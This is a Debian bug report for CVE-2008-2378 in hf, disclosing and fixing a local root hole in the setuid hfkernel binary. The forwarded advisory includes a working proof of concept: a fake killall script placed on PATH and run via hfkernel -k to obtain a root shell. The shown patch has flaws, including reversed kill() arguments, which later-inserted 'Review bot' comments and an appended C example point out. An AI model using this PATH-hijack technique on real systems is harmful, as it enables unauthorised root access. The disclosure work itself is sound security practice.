Debian Bug report logs - #504182
hf: CVE-2008-2378 insecure system call leading to local root


Package: hf; Maintainer for hf is (unknown);

Reported by: Nico Golde <nion@debian.org>

Date: Sat, 1 Nov 2008 13:36:01 UTC

Severity: grave

Tags: security

Fixed in version hf/0.8-8.1

Done: Nico Golde <nion@debian.org>

Bug is archived. No further changes may be made.



Report forwarded to debian-bugs-dist@lists.debian.org, Debian Hamradio Maintainers <debian-hams@lists.debian.org>:
Bug#504182; Package hf. (Sat, 01 Nov 2008 13:36:03 GMT)

Acknowledgement sent to Nico Golde <nion@debian.org>:
New Bug report received and forwarded. Copy sent to Debian Hamradio Maintainers <debian-hams@lists.debian.org>. (Sat, 01 Nov 2008 13:36:03 GMT)

Message #5 received at submit@bugs.debian.org:

From: Nico Golde <nion@debian.org>
To: submit@bugs.debian.org
Subject: [skx@debian.org: [Secure-testing-team] hf - CVE-2008-2378 - local root exploit]
Date: Sat, 1 Nov 2008 14:34:13 +0100
Source: hf
Severity: grave
Tags: security

----- Forwarded message from Steve Kemp <skx@debian.org> -----

From: Steve Kemp <skx@debian.org>
To: secure-testing-team@lists.alioth.debian.org
User-Agent: Mutt/1.5.17+20080114 (2008-01-14)
Cc: hf@packages.debian.org, team@security.debian.org
Subject: [Secure-testing-team] hf - CVE-2008-2378 - local root exploit


 The hf package, described by Debian as an amateur-radio protocol suite
 using a soundcard as a modem, is a program that eventually becomes
 setuid(0), and has a trivial security hole in it.

 By default the package installs "/usr/bin/hfkernel" as a typical binary,
 but when first started via the program "hf" the binary is changed to
 be setuid(root).

 This is demonstrated:

skx@gold:~$ hf
Hello I am hf, the startscript for hfterm & hfkernel.
I look for them in /usr/bin. If wrong, edit me.
hfkernel must run with root rights.
The suid bit has to be set. Be aware that this can be a security hole.
Please do as root "chmod 4755 /usr/bin/hfkernel".
or start this script again as root.


 If you do start the program as root the permissions are changed:

skx@gold:~$ sudo hf
Hello I am hf, the startscript for hfterm & hfkernel.
I look for them in /usr/bin. If wrong, edit me.
hfkernel must run with root rights.
The suid bit has to be set. But be aware that this can be a security hole.
I will do this now "chmod 4755 /usr/bin/hfkernel".
For you, root, I will start only hfkernel for test purposes.
...

  Now the program is setuid:

skx@gold:~$ ls -l /usr/bin/hfkernel
-rwsr-xr-x 1 root root 244120 2008-05-07 19:37 /usr/bin/hfkernel


  Unfortunately the hfkernel program contains a trivial root hole:

int main(int argc, char *argv[])
{
        // snip
        while ((c = getopt(argc, argv, "a:M:c:klhip:m:nt:s:r:Rf23")) != -1)
            switch (c) {

            // snip

                case 'k':
                    system ("killall hfkernel");

            //
}

  Creating ~/bin/killall is sufficient to gain root privileges.

skx@gold:~$ echo -e '#!/bin/sh\n/bin/sh' > ~bin/killall
skx@gold:~$ chmod 755 ~/bin/killall
skx@gold:~$ hfkernel -k
sh-3.2# id
uid=1000(skx) gid=1000(skx) euid=0(root)


  This has been given the identifier CVE-2008-2378.

  Below is the patch that I've come up with to fix this hole, which
 is a simple pidfile approach.  Unless anybody has any comments
 I'll upload a fix for Etch on Monday/Tuesday.

Steve
--


--- hf-0.8/hfkernel/main.c	2006-12-22 10:44:23.000000000 +0000
+++ hf-0.8.orig/hfkernel/main.c	2008-11-01 10:33:44.000000000 +0000
@@ -7,19 +7,7 @@
  *      Copyright (C) 1996  Thomas Sailer (sailer@ife.ee.ethz.ch)
  *      Swiss Federal Institute of Technology (ETH), Electronics Lab
  *	modified by Gnther Montag
- *      This program is free software; you can redistribute it and/or modify
- *      it under the terms of the GNU General Public License as published by
- *      the Free Software Foundation; either version 2 of the License, or
- *      (at your option) any later version.
- *
- *      This program is distributed in the hope that it will be useful,
- *      but WITHOUT ANY WARRANTY; without even the implied warranty of
- *      MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
- *      GNU General Public License for more details.
- *
- *      You should have received a copy of the GNU General Public License
- *      along with this program; if not, write to the Free Software
- *      Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
+ *      This program is free software; you can redistribute it and/or modify
 *      it under the terms of the GNU General Public License as published by
 *      the Free Software Foundation; either version 2 of the License, or
 *      (at your option) any later version.
 *
 *      This program is distributed in the hope that it will be useful,
 *      but WITHOUT ANY WARRANTY; without even the implied warranty of
 *      MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *      GNU General Public License for more details.
 *
 *      You should have received a copy of the GNU General Public License
 *      along with this program; if not, write to the Free Software
 *      Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
  *
  */
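Review bot: this hunk is whitespace-only churn in the license comment and unrelated to CVE-2008-2378: the thirteen `- *      This program is free software ...` lines are removed and re-added with one less leading space, nothing else changes. Drop it so the security patch stays minimal and easy to audit, and so it does not conflict with any other change to main.c.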
@@ -78,6 +66,11 @@
 #include "alsa.h"
 #endif /* HAVE_ALSA_ASOUNDLIB_H */
 
+#ifndef PID_FILE
+# define PID_FILE "/var/run/hfkernel.pid"
+#endif
+
+
 /* --------------------------------------------------------------------- */
 
 /* these variables take hfkernel's options */
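Review bot: the new `PID_FILE "/var/run/hfkernel.pid"` is only safe because hfkernel runs with root privileges and /var/run is a root-owned directory: the later `kill()` acts on whatever pid the file contains, so it matters that an unprivileged user cannot create or replace that file. State that assumption in a comment beside the `#define`, since anyone moving the file to a world-writable location (or running hfkernel without root) would silently lose that protection.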
@@ -154,6 +147,49 @@
 	}
 }
 
+void kill_daemon()
+{
+	FILE *f;
+	int pid;
+
+	if (!(f = fopen (PID_FILE, "r")))
+        {
+                 errstr( SEV_FATAL, "Failed to read from PID file");
+                  exit(1);
+        }
+	fscanf (f, "%d", &pid);
+	fclose (f);
+
+        kill( SIGKILL, pid );
+        unlink( PID_FILE );
+        exit(1);
+}
+
+
+int write_pid()
+{
+	char buf[20];
+	int fd;
+	long pid;
+
+	if ((fd = open (PID_FILE, O_CREAT | O_TRUNC | O_WRONLY, 0600)) == -1)
+	{
+                errstr (SEV_FATAL, "cannot open pidfile for writing ");
+                exit(1);
+	}
+        else
+        {
+		pid = getpid ();
+		snprintf (buf, sizeof (buf), "%ld", (long) pid);
+		if (write (fd, buf, strlen (buf)) != strlen (buf))
+                {
+                       errstr (SEV_FATAL, "cannot write to pidfile ");
+                       exit(1);
+                }
+		close(fd);
+	}
+	return pid;
+}
 
 /* --------------------------------------------------------------------- */
 
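Review bot: `kill( SIGKILL, pid );` in `kill_daemon()` has its arguments reversed. The prototype is `kill(pid_t pid, int sig)`, so as written it tries to send signal number `pid` to process 9, which fails with EINVAL for any pid above the highest signal number; `hfkernel -k` would therefore never stop the daemon. Use `kill(pid, SIGTERM)`, and prefer SIGTERM to SIGKILL so the daemon can release the sound device, which is also what `killall` sent before. In the same function the result of `fscanf (f, "%d", &pid);` is unchecked and `pid` is never validated: with an empty file or a file containing 0 or -1, a root process would call `kill(0, ...)` or `kill(-1, ...)` and signal its whole process group or every process on the system, so require `fscanf` to return 1 and reject `pid <= 1` before signalling. Finally, `kill_daemon()` reaches `exit(1)` on its success path as well; check the return values of `kill()` and `unlink()` and exit 0 when the signal was delivered.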
@@ -529,8 +565,8 @@
                     break;
 
                 case 'k':
-                    system ("killall hfkernel");
-
+                     kill_daemon();
+                     break;
                 case 'l':
                     logging = 1;
                     break;
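Review bot: replacing `system ("killall hfkernel")` with `kill_daemon();` is the right shape of fix: the shell and the PATH lookup that let a user-supplied `killall` run as root are removed entirely rather than patched over with an absolute path. Since every path through `kill_daemon()` ends in `exit()`, the added `break;` is unreachable; harmless, but say so in a comment or drop it so a reader does not assume option parsing continues after `-k`.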
@@ -635,6 +671,7 @@
 
                 exit(1);
         }
+
         if (logging)
                 openlog("hfkernel", LOG_PID, LOG_DAEMON);
 	printf("hfkernel %s starting...\n", PACKAGE_VERSION);
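Review bot: whitespace-only change (a blank line inserted before `if (logging)`); drop it so the patch contains nothing but the CVE fix.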
@@ -699,6 +736,8 @@
 
 	printf("Note: hfkernel is only part of the hf package.\n"); 
 	printf("It is controlled by the graphic terminal hfterm. To start them both, use the start script hf. In newer linuxes (kernel 2.6...) we need the syntax\n ÂŽLD_ASDSUME_KERNEL=2.2.5 hftermÂŽ, this is already prepared in the hf script. \n");
+        write_pid();
+
 	start_io_thread();
 	exit(0); }
 
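Review bot: the pidfile is never removed on normal shutdown: `write_pid();` is followed by `start_io_thread();` and `exit(0);` with no matching `unlink(PID_FILE)`, so after a clean exit or a crash a stale pidfile remains and a later `hfkernel -k` would signal, as root, whatever unrelated process has since been assigned that pid. Register the cleanup with `atexit()` (or unlink from the signal handler), and have `kill_daemon()` confirm the pid still belongs to a running hfkernel, at minimum via `kill(pid, 0)`, before sending the real signal.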

_______________________________________________
Secure-testing-team mailing list
Secure-testing-team@lists.alioth.debian.org
http://lists.alioth.debian.org/mailman/listinfo/secure-testing-team

----- End forwarded message -----

-- 
Nico Golde - http://www.ngolde.de - nion@jabber.ccc.de - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
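The `system("killall hfkernel")` call described above is dangerous because a setuid-root process resolves `killall` through the caller's PATH and runs it with root privileges; the pidfile approach in the forwarded patch removes the shell entirely. The following is an added example, not hf's code and not the patch as uploaded: a self-contained C implementation of the same approach that also covers the failure modes a reviewer would want handled. The pid read from the file is validated (0, 1, negative values and trailing garbage are rejected, since as root `kill(0, sig)` or `kill(-1, sig)` would signal the whole process group or every process), `kill()` is called with the pid first and the signal second, SIGTERM is used so the daemon can clean up, a liveness probe guards against stale pidfiles, and the file is opened with O_NOFOLLOW. The path `/tmp/hfkernel-example.pid` used in `main` is a constructed placeholder standing in for `/var/run/hfkernel.pid`.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE           /* exposes O_NOFOLLOW on glibc */
#endif
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Parse the contents of a pidfile. Returns the pid, or -1 unless the text is
 * a single integer >= 2 followed by at most whitespace. Rejecting 0, 1 and
 * negative values matters because a root process calling kill(0, sig) or
 * kill(-1, sig) signals its whole process group or every process on the box. */
pid_t parse_pid(const char *text)
{
    char *end;
    long v;

    errno = 0;
    v = strtol(text, &end, 10);
    if (end == text || errno != 0)
        return -1;                       /* no digits at all, or overflow */
    while (*end == '\n' || *end == ' ' || *end == '\t')
        end++;
    if (*end != '\0')
        return -1;                       /* trailing garbage: not a file we wrote */
    if (v < 2 || v > INT_MAX)
        return -1;
    return (pid_t)v;
}

/* Record our own pid in `path`. Returns 0 on success, -1 on failure.
 * O_NOFOLLOW refuses to write through a symlink planted in the directory. */
int write_pidfile(const char *path)
{
    char buf[32];
    int fd, n;

    fd = open(path, O_WRONLY | O_CREAT | O_TRUNC | O_NOFOLLOW, 0644);
    if (fd == -1)
        return -1;
    n = snprintf(buf, sizeof buf, "%ld\n", (long)getpid());
    if (n < 0 || (size_t)n >= sizeof buf || write(fd, buf, (size_t)n) != n) {
        close(fd);
        return -1;
    }
    return close(fd);
}

/* Read and validate the pid stored in `path`; -1 on any error. */
pid_t read_pidfile(const char *path)
{
    char buf[32];
    int fd;
    ssize_t n;

    fd = open(path, O_RDONLY | O_NOFOLLOW);
    if (fd == -1)
        return -1;
    n = read(fd, buf, sizeof buf - 1);
    close(fd);
    if (n <= 0)
        return -1;
    buf[n] = '\0';
    return parse_pid(buf);
}

/* What the vulnerable system("killall hfkernel") should have been: no shell,
 * no PATH lookup, kill() called as kill(pid, sig). Returns 0 on success.
 * Signal 0 probes whether the pid is alive without delivering anything, so a
 * stale pidfile never results in signalling an unrelated process. */
int stop_daemon(const char *path)
{
    pid_t pid = read_pidfile(path);

    if (pid < 0)
        return -1;
    if (kill(pid, 0) == -1)
        return -1;                       /* stale pidfile: process is gone */
    if (kill(pid, SIGTERM) == -1)
        return -1;
    return unlink(path);
}

int main(void)
{
    /* Constructed placeholder; a real daemon would use /var/run/hfkernel.pid. */
    const char *path = "/tmp/hfkernel-example.pid";

    if (write_pidfile(path) != 0) {
        perror("write_pidfile");
        return 1;
    }
    printf("pidfile holds %ld (we are %ld)\n",
           (long)read_pidfile(path), (long)getpid());
    printf("parse_pid(\"0\") = %ld, parse_pid(\"12abc\") = %ld\n",
           (long)parse_pid("0"), (long)parse_pid("12abc"));
    unlink(path);
    return 0;
}
```

The `kill(pid, 0)` probe narrows the stale-pidfile window but does not close it (the pid could be reused by another process); a fuller check would compare the target's executable, for instance via `/proc/<pid>/exe`, before sending SIGTERM.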

Changed Bug title to `hf: CVE-2008-2378 insecure system call leading to local root' from `[skx@debian.org: [Secure-testing-team] hf - CVE-2008-2378 - local root exploit]'. Request was from Nico Golde <nion@debian.org> to control@bugs.debian.org. (Sat, 01 Nov 2008 13:42:02 GMT)

Information forwarded to debian-bugs-dist@lists.debian.org, Debian Hamradio Maintainers <debian-hams@lists.debian.org>:
Bug#504182; Package hf. (Wed, 05 Nov 2008 20:33:05 GMT)

Acknowledgement sent to Nico Golde <nion@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian Hamradio Maintainers <debian-hams@lists.debian.org>. (Wed, 05 Nov 2008 20:33:05 GMT)

Message #12 received at 504182@bugs.debian.org:

From: Nico Golde <nion@debian.org>
To: 504182@bugs.debian.org
Subject: intent to NMU
Date: Wed, 5 Nov 2008 21:23:14 +0100
Hi,
I intend to upload an NMU to fix this bug.
debdiff attached and archived on:
http://people.debian.org/~nion/nmu-diff/hf-0.8-8_0.8-8.1.patch

Cheers
Nico

-- 
Nico Golde - http://www.ngolde.de - nion@jabber.ccc.de - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
[hf-0.8-8_0.8-8.1.patch (text/x-diff, attachment)]

Reply sent to Nico Golde <nion@debian.org>:
You have taken responsibility. (Wed, 05 Nov 2008 21:15:19 GMT)

Notification sent to Nico Golde <nion@debian.org>:
Bug acknowledged by developer. (Wed, 05 Nov 2008 21:15:23 GMT)

Message #17 received at 504182-close@bugs.debian.org:

From: Nico Golde <nion@debian.org>
To: 504182-close@bugs.debian.org
Subject: Bug#504182: fixed in hf 0.8-8.1
Date: Wed, 05 Nov 2008 21:02:48 +0000
Source: hf
Source-Version: 0.8-8.1

We believe that the bug you reported is fixed in the latest version of
hf, which is due to be installed in the Debian FTP archive:

hf_0.8-8.1.diff.gz
  to pool/main/h/hf/hf_0.8-8.1.diff.gz
hf_0.8-8.1.dsc
  to pool/main/h/hf/hf_0.8-8.1.dsc
hf_0.8-8.1_amd64.deb
  to pool/main/h/hf/hf_0.8-8.1_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 504182@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Nico Golde <nion@debian.org> (supplier of updated hf package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Wed, 05 Nov 2008 21:19:58 +0100
Source: hf
Binary: hf
Architecture: source amd64
Version: 0.8-8.1
Distribution: unstable
Urgency: high
Maintainer: Debian Hamradio Maintainers <debian-hams@lists.debian.org>
Changed-By: Nico Golde <nion@debian.org>
Description: 
 hf         - amateur-radio protocol suite using a soundcard as a modem
Closes: 504182
Changes: 
 hf (0.8-8.1) unstable; urgency=high
 .
   * Non-maintainer upload by the Security Team.
   * Fix local root security hole that is caused by an insecure call
     to the system function, thanks Steve Kemp for the patch
     (CVE-2008-2378; Closes: #504182).
Checksums-Sha1: 
 551137d242d3aa54fdc9d5e4860baf3a6d901ac5 1212 hf_0.8-8.1.dsc
 1f0eec520ca27db2fbd2efc8cf6b496ce0ad5197 126128 hf_0.8-8.1.diff.gz
 abcca04dc39871c43c84825cb9fea847b72d6b4c 681254 hf_0.8-8.1_amd64.deb
Checksums-Sha256: 
 36be9e4b38cd3b9428164d80817b46c10b7e7f4eb5fe9eee30c013559e9b1cec 1212 hf_0.8-8.1.dsc
 90728620ec02b70a4236d4f63bbfe86f04ec35c3db09c8f9048ce48f322eb2a8 126128 hf_0.8-8.1.diff.gz
 abb2ef7f75c5413daa5ad35b77ac056ed8ae135d6e50dac49de8ae3ff2db085e 681254 hf_0.8-8.1_amd64.deb
Files: 
 d6dc9fe5aaf6a9c5dd048e155b5a25f4 1212 hamradio optional hf_0.8-8.1.dsc
 a87b6c21a254bcd533d8e7c4b4f7f996 126128 hamradio optional hf_0.8-8.1.diff.gz
 92ed2485529738970c0a35b8be59cdb5 681254 hamradio optional hf_0.8-8.1_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkkSASQACgkQHYflSXNkfP96nwCghgmz14682qg/7PCprto1wm25
z9YAoI776e+MhOJNjOQ1wEiKajUhHtiE
=7zZJ
-----END PGP SIGNATURE-----





Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Fri, 19 Dec 2008 07:33:33 GMT)



Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Mon Apr 21 00:10:42 2014; Machine Name: buxtehude.debian.org
